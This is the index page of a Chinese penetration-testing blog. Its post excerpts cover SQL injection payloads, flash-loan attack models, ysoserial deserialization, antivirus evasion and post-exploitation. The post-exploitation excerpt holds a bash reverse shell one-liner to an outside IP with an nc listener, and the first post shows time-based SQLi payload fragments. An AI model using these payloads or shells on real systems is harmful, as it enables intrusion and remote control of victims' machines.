laker's Blog

记录渗透测试琐事仅仅


  • Home

  • Archives

  • Categories

  • Tags

  • About

【置顶】渗透测试Payload记录

Posted on 2022-08-19
SQLi12345678910111213141516模糊查询%' and '%'='%模糊查询%'and'%'='%if(now()=sysdate(),sleep(10),0)/*'XOR(if(now() ...
Read more »

闪电贷套利模型

Posted on 2021-03-26
模型1 使用交易所原本差价参见之前的文章 模型2 使用抵押品不足未爆仓–头寸健康度Bzx事件( 0xb5c8bd9430b6cc87a0e2fe110ece6bf527fa4f170a4bc8cd032f768fc5219838 ) 攻击流程:1234[BTC吸筹]第一步,从dYdX中借出了10,0 ...
Read more »

闪电贷套利

Posted on 2021-03-19
套利准备本次使用流程 第一步我们要借款,根据dydx规则,我们需要先完成一个 initiateFlashLoan 函数(闪电贷开始函数), 其amount即为需要借的数量 1234567891011121314151617181920function initiateFlashLoan(uint2 ...
Read more »

ysoserial--JBoss篇

Posted on 2020-12-31
前言 ysoserial是一款在Github开源的知名java 反序列化利用工具,里面集合了各种java反序列化payload。该工具涉及大量的序列化与反序列化、反射等安全研究人员所必备的JAVA代码技能,通过对该框架的分析,我们可以个更好的学习该工具,巩固JAVA代码审计的技能树。同时在二次开发和 ...
Read more »

免杀相关思考

Posted on 2020-12-28
第一节是框架免杀首先框架最为出名的是veil(面纱),官方仓库https://github.com/Veil-Framework/Veil 同时该框架能够和metasploit与CobalStrike联动 此处的安装思路我采用云主机安装(打包成进行镜像) 这样在每次使用我能起一个vps设备而不依赖机 ...
Read more »

Tomcat源码编译-IDEA

Posted on 2020-12-22
[转载文章] 首先下载tomcat源码** 下载地址如下: http://archive.apache.org/dist/tomcat/tomcat-8/v8.5.46/src/ http://archive.apache.org/dist/tomcat/tomcat-8/v8.5.46/src/a ...
Read more »

LinuxSSH后门相关

Posted on 2020-12-17
找出读写的openSSH后门 1234ps aux | grep "sshd"stace -o aa -ff -p 1132SSH登录后grep open aa* | grep -v -e No -e null -e denied | grep WR Linux获取版本 ...
Read more »

后渗透攻击技巧

Posted on 2020-12-11
标准ShellLinux在使用蚁剑开启的虚拟终端是非交互式的(not pty) 需要获取交互式shell 获取方式举例() 12vps: nc -lvvp 9999target: bash -i >&/dev/tcp/119.23.31.7/9999 0>&1 获 ...
Read more »

三大框架整合

Posted on 2020-12-11
创建工程键值设置 [防止加载过慢]archetypeCatalog = internal 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556 ...
Read more »

java-web中几种注册方式

Posted on 2020-11-25
第一种:Servlet建WEB项目 增加web.xml 12345678910111213<servlet> <servlet-name>partServlet</servlet-name> <servlet-class> ...
Read more »
12…5<i class="fa fa-angle-right"></i>

43 posts
6 tags
Links
  • th3wind
  • damit5
© 2021 laker
Powered by Hexo

本站总访问量次 | 本站访客数人